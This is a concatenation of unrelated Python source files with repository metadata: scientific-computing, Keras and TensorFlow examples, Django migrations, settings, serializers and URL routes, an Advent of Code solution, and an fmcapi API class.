"""
if iteration is None:
iteration = self.__iteration
if self.hasAlpha(iteration, qoi, t, dtype):
return self.__alphas[iteration][qoi][dtype][t]
else:
raise AttributeError('no knowledge for (i=%i, t=%g, qoi=%s, dtype=%i)' % (iteration, t, qoi,
dtype))
def getAlphasByQoI(self, qoi='_', dtype=KnowledgeTypes.SIMPLE,
iteration=None):
"""
Get all coefficient vectors for the given quantity of interest
@param qoi: string quantity of interest
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
if qoi in self.__alphas[iteration] and \
dtype in self.__alphas[iteration][qoi]:
return self.__alphas[iteration][qoi][dtype]
else:
raise AttributeError('no knowledge for (i=%i, qoi=%s, dtype=%i)' % (iteration, qoi,
KnowledgeTypes.toString(dtype)))
def getSparseGridFunction(self, qoi='_', t=0, dtype=KnowledgeTypes.SIMPLE,
iteration=None):
"""
Get the sparse grid function (grid, alpha) for the given setting
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
# check if there is the desired grid
if self.hasGrid(iteration, qoi):
grid = self.getGrid(qoi, iteration=iteration)
else:
raise AttributeError('the grid for (i=%i, qoi=%s) does not exist' % (iteration, qoi))
# check if there is the desired surplus vector
if self.hasAlpha(iteration, qoi, t, dtype):
alpha = self.getAlpha(qoi, t, dtype, iteration=iteration)
else:
raise AttributeError('the surplus vector for (i=%i, qoi=%s, t=%g, dtype=%i) does not exist'
% (iteration, qoi, t, dtype))
return grid, alpha
def getAlphas(self):
return self.__alphas
def setAlphas(self, alphas):
self.__alphas = alphas
def getGrids(self):
return self.__grids
def setGrids(self, grids):
self.__grids = grids
def update(self, grid, alpha, qoi, t, dtype, iteration):
"""
Update the knowledge
@param grid: Grid
@param alpha: numpy array surplus vector
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
@param iteration: int iteration number
"""
# build dictionary
if iteration not in self.__alphas:
self.__alphas[iteration] = {}
self.__grids[iteration] = {}
if qoi not in self.__alphas[iteration]:
self.__alphas[iteration][qoi] = {}
self.__grids[iteration][qoi] = {}
if dtype not in self.__alphas[iteration][qoi]:
self.__alphas[iteration][qoi][dtype] = {}
if t not in self.__alphas[iteration][qoi][dtype]:
self.__alphas[iteration][qoi][dtype][t] = {}
# store knowledge
self.__iteration = iteration
self.__grids[iteration][qoi] = grid.clone()
self.__alphas[iteration][qoi][dtype][t] = np.array(alpha)
def clearAlphas(self):
self.__alphas = {}
# ----------------------------------------------------------------
# ASGCKnowledge File Formatter
# ----------------------------------------------------------------
def setMemento(self, memento):
"""
Restores the state which is saved in the given memento
@param memento: the memento object
"""
self.fromJson(memento)
def createMemento(self):
"""
Creates a new memento to hold the current state
"""
jsonString = self.toJson()
jsonObject = json.JsonReader().read(jsonString)
return jsonObject
def writeToFile(self, filename):
"""
Write knowledge object to file
"""
m = self.createMemento()
ASGCKnowledgeFormatter().serializeToFile(m, filename)
@classmethod
def fromJson(cls, jsonObject):
"""
Restores the ASGC object from the json object with its
attributes.
@param jsonObject: json object
@return: the restored ASGC object
"""
knowledge = ASGCKnowledge()
# restore iteration
key = '_ASGCKnowledge__iteration'
if key in jsonObject:
knowledge.setIteration(int(jsonObject[key]))
# restore surpluses: {iteration: {qoi: {dtype: {t: <Grid>}}}}
key = '_ASGCKnowledge__grids'
if key in jsonObject:
grids = {}
for iteration, v1 in jsonObject[key].items():
d1 = {}
for qoi, gridString in v1.items():
# undo the hack that made it json compatible
gridString = gridString.replace('__', '\n')\
.encode('utf8')
# deserialize ...
grid = Grid.unserialize(gridString)
# ... and store it
d1[qoi] = grid
grids[int(iteration)] = d1
knowledge.setGrids(grids)
# restore surpluses: {iteration: {qoi: {dtype: {t: <list float>}}}}
key = '_ASGCKnowledge__alphas'
if key in jsonObject:
alphas = {}
for iteration, v1 in jsonObject[key].items():
d1 = {}
for qoi, v2 in v1.items():
d2 = {}
for dtype, v3 in v2.items():
d3 = {}
for t, alpha in v3.items():
d3[float(t)] = DataVector(alpha).array()
d2[int(dtype)] = d3
d1[qoi] = d2
alphas[int(iteration)] = d1
knowledge.setAlphas(alphas)
return knowledge
def toJson(self):
"""
@return: a string that represents the object
"""
serializationString = '"module" : "' + \
self.__module__ + '",\n'
attrName = "_ASGCKnowledge__alphas"
attrValue = self.__getattribute__(attrName)
serializationString += ju.parseAttribute(attrValue, attrName)
attrName = "_ASGCKnowledge__grids"
attrValue = self.__getattribute__(attrName)
serializationString += ju.parseAttribute(attrValue, attrName)
attrName = "_ASGCKnowledge__iteration"
attrValue = self.__getattribute__(attrName)
serializationString += ju.parseAttribute(attrValue, attrName)
s = serializationString.rstrip(",\n")
# print "j-------------------------------------------"
# print "{" + s + "}"
# print "j-------------------------------------------"
return "{" + s + "}"
def __str__(self):
return "%i, alphas=%i, grids=%i" % (self.__iteration,
len(self.__alphas),
len(self.__grids))
|
[
"dirk.pflueger@ipvs.uni-stuttgart.de"
] |
dirk.pflueger@ipvs.uni-stuttgart.de
|
4e63a72eaba3f13bff579913c6fdfd0aca1897d5
|
dc2a3ce315feec4757bc41215faff57ffdf546a0
|
/Classification/classification.py
|
724029a5f06b46a72a69f9da079f1008d42d44da
|
[] |
no_license
|
heheli1998/Keras
|
d35247474eedc3266679c6f144f7d7713445bfc0
|
fe0f98c17b394ceed8839dd45da568cc97b5a0fd
|
refs/heads/master
| 2020-09-16T08:02:58.190007
| 2019-11-24T09:06:37
| 2019-11-24T09:06:37
| 223,706,332
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
from sklearn import datasets
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from keras.layers import Dropout
from keras.optimizers import SGD
from keras.constraints import maxnorm
from keras.callbacks import LearningRateScheduler
from math import pow,floor
#导入数据
dataset = datasets.load_iris()
x = dataset.data
Y = dataset.target
seed = 7
np.random.seed(seed)
#构建模型函数
def create_model(init='glorot_uniform'):
#构建模型
model = Sequential()
# model.add(Dropout(rate=0.2,input_shape=(4,)))
model.add(Dense(units=4,activation='relu',input_dim=4,kernel_initializer=init)) #kernel_constraint=maxnorm(3)))
# model.add(Dropout(rate=0.2))
model.add(Dense(units=6, activation='relu', kernel_initializer=init))#kernel_constraint=maxnorm(3)))
# model.add(Dropout(rate=0.2))
model.add(Dense(units=3, activation='softmax',kernel_initializer=init))
learningRate = 0.1
momentum = 0.9
decay_rate = 0.0
sgd = SGD(lr=learningRate, momentum=momentum, decay=decay_rate, nesterov=False)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
return model
#编译模型
def step_decay(epoch):
init_lrate = 0.1
drop = 0.5
epoch_drop = 10
lrate = init_lrate * pow(drop,floor(1+epoch) / epoch_drop)
return lrate
lrate = LearningRateScheduler(step_decay)
epochs = 200
model = KerasClassifier(build_fn=create_model,epochs=epochs,batch_size=5,verbose=1,callbacks=[lrate])
# kfold = KFold(n_splits=10,shuffle=True,random_state=seed) #交叉验证
# results = cross_val_score(model,x,Y,cv=kfold)
# print('Accuracy:%.2f%% (%.2f)' % (results.mean()*100, results.std()))
model.fit(x,Y)
|
[
"heheli1998@163.com"
] |
heheli1998@163.com
|
dd361d96adb18cce06be249bb17bbb8bac0e4f9e
|
564bb8953ad74f25bb81831c6280e98a5e8ca75a
|
/tweet/migrations/0002_auto_20200322_0845.py
|
53775cbd5cd1f4f0350bf2d80691b0b8d20de3d6
|
[] |
no_license
|
MohamedHany2002/my-twitter
|
600c083c10c006074dd1aa55d112291c731f8bc4
|
5f7048c3fd00a894b7c5de580954747e6421b77d
|
refs/heads/master
| 2022-07-03T09:12:34.741192
| 2020-05-12T15:29:41
| 2020-05-12T15:29:41
| 263,376,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 890
|
py
|
# Generated by Django 2.2.7 on 2020-03-22 06:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tweet', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='tweet',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='tweet',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='tweets', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"goldenhany94@gmail.com"
] |
goldenhany94@gmail.com
|
22b9d9e66e5210c42c0ef9b33d420d68606ed622
|
4d78a5835fb413a565957a432464a27fed7d80e8
|
/midca/modules/interpret/InformedDiscrepancyDetector.py
|
2b39b0e4191c9fc57935819c81ca73afd37f6cf7
|
[
"MIT"
] |
permissive
|
COLAB2/midca
|
0daac59415eaf418aebb4578deba19cd82d24760
|
abd41ab91d8a4e9582860a55b5b10657d0a560e0
|
refs/heads/master
| 2023-06-23T05:34:13.837128
| 2022-05-03T18:13:11
| 2022-05-03T18:13:11
| 106,867,470
| 18
| 6
|
MIT
| 2021-06-10T12:39:46
| 2017-10-13T19:53:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,367
|
py
|
import copy
from midca.modules.interpret._adist import ADistance, ChangeFinder, WindowPair, Interval
from midca.domains.nbeacons import nbeacons_util
import sys
class InformedDiscrepancyDetector:
'''
Performs Discrepancy Detection using Informed Expectations
TODO: This is a stub for now, not implemented yet
'''
def __init__(self):
pass
def init(self, world, mem):
self.world = world
self.mem = mem
def get_current_plan(self):
'''
Returns the current plan the agent is using
'''
pass
def generate_inf_exp(self, plan, prev_action):
'''
Returns a set of atoms to check against the state given the previous action
the agent executed and the current plan
See Dannenhauer & Munoz-Avila IJCAI-2015 / Dannenhauer, Munoz-Avila, Cox IJCAI-2016
for more information on informed expectations
TODO: finish
'''
# sanity check, make sure prev_action is in the plan
if prev_action not in plan:
raise Exception("Cannot generate informed expectations: prev_action "+str(prev_action)+" was not given plan")
exp = [] # expectations accumulator
pass
def run(self, cycle, verbose=2):
prev_action = self.mem.get(self.mem.ACTIONS)[-1]
curr_goals = self.mem.get(self.mem.CURRENT_GOALS)
plan = self.mem.get(self.mem.GOAL_GRAPH).get_best_plan(curr_goals)
inf_exp = self.generate_inf_exp(prev_action)
for e in inf_exp:
pass
|
[
"sampath.gogineni@gmail.com"
] |
sampath.gogineni@gmail.com
|
2375332da2211a3bce2093cfd124276215bd804d
|
e5af6abb44dec19a607a11981af7b3d12f9d59c7
|
/day11/ch2.py
|
986d6e08d0d155f1497bee38f9ecdd1591cab049
|
[] |
no_license
|
jakubmatyszewski/adventofcode2020
|
ec1cbcfe0f35d3218bf9c8853ac85983cf995dfd
|
aafce6cb1d7c97b5eb2c3964298069eca44747a2
|
refs/heads/master
| 2023-02-16T17:02:50.231903
| 2021-01-02T23:41:19
| 2021-01-02T23:44:46
| 319,111,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,439
|
py
|
def rotation(arr):
new_arr = []
xd = len(arr) # x dimension
yd = len(arr[0]) # y dimension
for row in range(xd):
tmp_row = ''
for col in range(yd):
adj = []
for x in (-1, 0, 1):
for y in (-1, 0, 1):
i = 1
if x == y == 0:
continue
while 0 <= row + i * x < xd and 0 <= col + i * y < yd:
if (place := arr[row + i * x][col + i * y]) != '.':
adj.append(place)
break
i += 1
if arr[row][col] == 'L' and '#' not in adj:
tmp_row += '#'
elif arr[row][col] == '#' and adj.count('#') >= 5:
tmp_row += 'L'
else:
tmp_row += arr[row][col]
new_arr.append(tmp_row)
return new_arr
def challenge(arr):
while True:
output = rotation(arr)
if output == arr:
return ''.join(arr).count('#')
arr = output
def from_txt(filepath='input.txt'):
try:
array = open(filepath, 'r').read().splitlines()
except FileNotFoundError:
filepath = input("Enter full path to input file.\n")
array = open(filepath, 'r').read().splitlines()
return array
if __name__ == "__main__":
input_array = from_txt()
print(challenge(input_array))
|
[
"jakubmatyszewski1@gmail.com"
] |
jakubmatyszewski1@gmail.com
|
ffd75793ca5d720d2024a3556765bc80e7c4c7e1
|
c2dae49452480b7611e7dcfe90cc1e97af667e45
|
/accounts/serializers.py
|
7638fc69df2064f2f74dbd3d0c717498910e62fb
|
[] |
no_license
|
jcperezbanuchi/barbershop_app
|
ad8792dc3854c554b80e8b8e8ac2c139ac925cbd
|
5288335bfc0562f2f8d2f7923b51a510c1966fa7
|
refs/heads/main
| 2023-05-31T21:54:23.483059
| 2021-07-13T20:06:48
| 2021-07-13T20:06:48
| 383,232,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,029
|
py
|
from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
# user serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email')
# register serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email', 'password')
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])
return user
# login serializer
class LoginSerializer(serializers.Serializer):
username =serializers.CharField()
password= serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError('Incorrect Credentials')
|
[
"juanco@Juans-Air"
] |
juanco@Juans-Air
|
7c37e6aef8973598ad64ad4f06841a103149c17a
|
9ae3a94afb8a7affcfb9eba8ed041099d2b5c13b
|
/estimators/linear_model.py
|
19ee30c868bd68f7be26f8ddc87a7e82cf15e003
|
[] |
no_license
|
Leo-Bright/TensorFlow2.0
|
83bd07ce0cbbb2381f3bff54451c097754016b28
|
72b33332d0a57d9855f67499979925162122000d
|
refs/heads/master
| 2020-06-18T11:40:07.733003
| 2019-08-11T15:27:02
| 2019-08-11T15:27:02
| 196,292,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,019
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from IPython.display import clear_output
from six.moves import urllib
import tensorflow.compat.v2.feature_column as fc
import tensorflow as tf
from sklearn.metrics import roc_curve
# Load dataset.
dftrain = pd.read_csv('datasets/titanic/train.csv')
dfeval = pd.read_csv('datasets/titanic/eval.csv')
y_train = dftrain.pop('survived')
y_eval = dfeval.pop('survived')
# print(dftrain.head())
dftrain.age.hist(bins=20)
dftrain.sex.value_counts().plot(kind='barh')
CATEGORICAL_COLUMNS = ['sex', 'n_siblings_spouses', 'parch', 'class', 'deck',
'embark_town', 'alone']
NUMERIC_COLUMNS = ['age', 'fare']
feature_columns = []
for feature_name in CATEGORICAL_COLUMNS:
vocabulary = dftrain[feature_name].unique()
feature_columns.append(tf.feature_column.categorical_column_with_vocabulary_list(feature_name, vocabulary))
for feature_name in NUMERIC_COLUMNS:
feature_columns.append(tf.feature_column.numeric_column(feature_name, dtype=tf.float32))
def make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):
def input_function():
ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df))
if shuffle:
ds = ds.shuffle(1000)
ds = ds.batch(batch_size).repeat(num_epochs)
return ds
return input_function
train_input_fn = make_input_fn(dftrain, y_train)
eval_input_fn = make_input_fn(dfeval, y_eval, num_epochs=1, shuffle=False)
ds = make_input_fn(dftrain, y_train, batch_size=10)()
for feature_batch, label_batch in ds.take(1):
print('Some feature keys:', list(feature_batch.keys()))
print()
print('A batch of class:', feature_batch['class'].numpy())
print()
print('A batch of Labels:', label_batch.numpy())
age_column = feature_columns[7]
tf.keras.layers.DenseFeatures([age_column])(feature_batch).numpy()
gender_column = feature_columns[0]
tf.keras.layers.DenseFeatures([tf.feature_column.indicator_column(gender_column)])(feature_batch).numpy()
linear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns)
linear_est.train(train_input_fn)
result = linear_est.evaluate(eval_input_fn)
clear_output()
print(result)
age_x_gender = tf.feature_column.crossed_column(['age', 'sex'], hash_bucket_size=100)
derived_feature_columns = [age_x_gender]
linear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns+derived_feature_columns)
linear_est.train(train_input_fn)
result = linear_est.evaluate(eval_input_fn)
clear_output()
print(result)
pred_dicts = list(linear_est.predict(eval_input_fn))
probs = pd.Series([pred['probabilities'][1] for pred in pred_dicts])
probs.plot(kind='hist', bins=20, title='predicted probabilities')
fpr, tpr, _ = roc_curve(y_eval, probs)
plt.plot(fpr, tpr)
plt.title('ROC curve')
plt.xlabel('false positive rate')
plt.ylabel('true positive rate')
plt.xlim(0,)
plt.ylim(0,)
plt.show()
|
[
"564312023@qq.com"
] |
564312023@qq.com
|
e10f76bdb851ff9faa30ab7ffb5dfac9ac70f5e4
|
56482e0b2ce6517fff41d0f78e0c0ed000d977a1
|
/fmcapi/api_objects/object_services/variablesets.py
|
6d55f6aeb55cabfd00004ef6be0d725acdb058fb
|
[
"BSD-3-Clause"
] |
permissive
|
banzigaga/fmcapi
|
ab4d7aaaf4be4f2b0686d07b6272f8b9531577da
|
fd924de96e200ca8e0d5088b27a5abaf6f915bc6
|
refs/heads/master
| 2020-12-11T14:45:07.896571
| 2019-12-12T20:02:07
| 2019-12-12T20:02:07
| 233,876,405
| 1
| 0
|
BSD-3-Clause
| 2020-01-14T15:46:26
| 2020-01-14T15:46:26
| null |
UTF-8
|
Python
| false
| false
| 1,588
|
py
|
"""Variable Sets Class."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
import logging
import warnings
class VariableSets(APIClassTemplate):
"""The VariableSets Object in the FMC."""
VALID_JSON_DATA = ["id", "name", "type", "description"]
VALID_FOR_KWARGS = VALID_JSON_DATA + []
URL_SUFFIX = "/object/variablesets"
def __init__(self, fmc, **kwargs):
"""
Initialize VariableSets object.
:param fmc: (object) FMC object
:param kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for VariableSets class.")
self.parse_kwargs(**kwargs)
def post(self):
"""POST method for API for VariableSets not supported."""
logging.info("POST method for API for VariableSets not supported.")
pass
def put(self):
"""PUT method for API for VariableSets not supported."""
logging.info("PUT method for API for VariableSets not supported.")
pass
def delete(self):
"""DELETE method for API for VariableSets not supported."""
logging.info("DELETE method for API for VariableSets not supported.")
pass
class VariableSet(VariableSets):
"""
Dispose of this Class after 20210101.
Use VariableSets() instead.
"""
def __init__(self, fmc, **kwargs):
warnings.resetwarnings()
warnings.warn("Deprecated: VariableSet() should be called via VariableSets().")
super().__init__(fmc, **kwargs)
|
[
"dmickels@cisco.com"
] |
dmickels@cisco.com
|
d2c11e7a18fdf03551a270f0adb16eb6a7b4a84c
|
3b660ddf98c162535558d5d8b90656cddf67554a
|
/acl_project/settings.py
|
a4bfa3d6482911272e27d8c9b3bc72583334cc82
|
[] |
no_license
|
kylenicola/acl_project
|
a22acf068ebbdf075ade01332c85226209a8e41a
|
5690cb5402094e6459d1721590ba84a0b74433cb
|
refs/heads/master
| 2020-05-17T15:15:48.870040
| 2014-07-09T02:42:40
| 2014-07-09T02:42:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,014
|
py
|
"""
Django settings for acl_project project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8*_o2))08o_vt3af5=ncw&^60i(11h&9bhcs_!ec=#g+*-lg+='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'acl_app',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'acl_project.urls'
WSGI_APPLICATION = 'acl_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
|
[
"kyle.a.nicola@utexas.edu"
] |
kyle.a.nicola@utexas.edu
|
0cb53c5f1f5e228f46b876f1f6b566519a1b9b0e
|
cdeeeb769e70b8fc87eabd15fd2d18e5438d3215
|
/project/epi/urls.py
|
000eebe45973e759af0ac1b43a9766a1e9660eb7
|
[
"MIT"
] |
permissive
|
nlewycky/hawc
|
b897be18499fcd018c0c5e8ba866db3e9f360bc9
|
8310ab549ea6bcc2d890314258ebef8f04970be3
|
refs/heads/master
| 2020-05-18T09:02:03.045370
| 2019-04-11T10:43:12
| 2019-04-11T10:43:12
| 184,313,167
| 0
| 0
| null | 2019-04-30T18:37:14
| 2019-04-30T18:37:13
| null |
UTF-8
|
Python
| false
| false
| 5,054
|
py
|
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from . import api, views
router = DefaultRouter()
router.register(r'study-population', api.StudyPopulation, base_name="study-population")
router.register(r'exposure', api.Exposure, base_name="exposure")
router.register(r'outcome', api.Outcome, base_name="outcome")
router.register(r'result', api.Result, base_name="result")
router.register(r'comparison-set', api.ComparisonSet, base_name="set")
router.register(r'group', api.Group, base_name="group")
router.register(r'outcome-cleanup', api.OutcomeCleanup, base_name="outcome-cleanup")
urlpatterns = [
url(r'^api/', include(router.urls, namespace='api')),
# Criteria
url(r'^assessment/(?P<pk>\d+)/study-criteria/create/$',
views.StudyCriteriaCreate.as_view(),
name='studycriteria_create'),
# Adjustment factors
url(r'^assessment/(?P<pk>\d+)/adjustment-factor/create/$',
views.AdjustmentFactorCreate.as_view(),
name='adjustmentfactor_create'),
# Study population
url(r'^study/(?P<pk>\d+)/study-population/create/$',
views.StudyPopulationCreate.as_view(),
name='sp_create'),
url(r'^study/(?P<pk>\d+)/study-population/copy-as-new-selector/$',
views.StudyPopulationCopyAsNewSelector.as_view(),
name='sp_copy_selector'),
url(r'^study-population/(?P<pk>\d+)/$',
views.StudyPopulationDetail.as_view(),
name='sp_detail'),
url(r'^study-population/(?P<pk>\d+)/update/$',
views.StudyPopulationUpdate.as_view(),
name='sp_update'),
url(r'^study-population/(?P<pk>\d+)/delete/$',
views.StudyPopulationDelete.as_view(),
name='sp_delete'),
# Exposure
url(r'^study/(?P<pk>\d+)/exposure/create/$',
views.ExposureCreate.as_view(),
name='exp_create'),
url(r'^study/(?P<pk>\d+)/exposure/copy-as-new-selector/$',
views.ExposureCopyAsNewSelector.as_view(),
name='exp_copy_selector'),
url(r'^exposure/(?P<pk>\d+)/$',
views.ExposureDetail.as_view(),
name='exp_detail'),
url(r'^exposure/(?P<pk>\d+)/update/$',
views.ExposureUpdate.as_view(),
name='exp_update'),
url(r'^exposure/(?P<pk>\d+)/delete/$',
views.ExposureDelete.as_view(),
name='exp_delete'),
# Outcome
url(r'^assessment/(?P<pk>\d+)/export/$',
views.OutcomeExport.as_view(),
name='outcome_export'),
url(r'^assessment/(?P<pk>\d+)/outcomes/$',
views.OutcomeList.as_view(),
name='outcome_list'),
url(r'^study-population/(?P<pk>\d+)/outcome/create/$',
views.OutcomeCreate.as_view(),
name='outcome_create'),
url(r'^study-population/(?P<pk>\d+)/outcome/copy-as-new-selector/$',
views.OutcomeCopyAsNewSelector.as_view(),
name='outcome_copy_selector'),
url(r'^outcome/(?P<pk>\d+)/$',
views.OutcomeDetail.as_view(),
name='outcome_detail'),
url(r'^outcome/(?P<pk>\d+)/update/$',
views.OutcomeUpdate.as_view(),
name='outcome_update'),
url(r'^outcome/(?P<pk>\d+)/delete/$',
views.OutcomeDelete.as_view(),
name='outcome_delete'),
# Results
url(r'^outcome/(?P<pk>\d+)/result/create/$',
views.ResultCreate.as_view(),
name='result_create'),
url(r'^outcome/(?P<pk>\d+)/result/copy-as-new-selector/$',
views.ResultCopyAsNewSelector.as_view(),
name='result_copy_selector'),
url(r'^result/(?P<pk>\d+)/$',
views.ResultDetail.as_view(),
name='result_detail'),
url(r'^result/(?P<pk>\d+)/update/$',
views.ResultUpdate.as_view(),
name='result_update'),
url(r'^result/(?P<pk>\d+)/delete/$',
views.ResultDelete.as_view(),
name='result_delete'),
# Comparison set
url(r'^study-population/(?P<pk>\d+)/comparison-set/create/$',
views.ComparisonSetCreate.as_view(),
name='cs_create'),
url(r'^study-population/(?P<pk>\d+)/comparison-set/copy-as-new-selector/$',
views.ComparisonSetStudyPopCopySelector.as_view(),
name='cs_copy_selector'),
url(r'^outcome/(?P<pk>\d+)/comparison-set/create/$',
views.ComparisonSetOutcomeCreate.as_view(),
name='cs_outcome_create'),
url(r'^outcome/(?P<pk>\d+)/comparison-set/copy-as-new-selector/$',
views.ComparisonSetOutcomeCopySelector.as_view(),
name='cs_outcome_copy_selector'),
url(r'^comparison-set/(?P<pk>\d+)/$',
views.ComparisonSetDetail.as_view(),
name='cs_detail'),
url(r'^comparison-set/(?P<pk>\d+)/update/$',
views.ComparisonSetUpdate.as_view(),
name='cs_update'),
url(r'^comparison-set/(?P<pk>\d+)/delete/$',
views.ComparisonSetDelete.as_view(),
name='cs_delete'),
# Groups (in comparison set)
url(r'^group/(?P<pk>\d+)/$',
views.GroupDetail.as_view(),
name='g_detail'),
url(r'^group/(?P<pk>\d+)/update/$',
views.GroupUpdate.as_view(),
name='g_update'),
]
|
[
"shapiromatron@gmail.com"
] |
shapiromatron@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.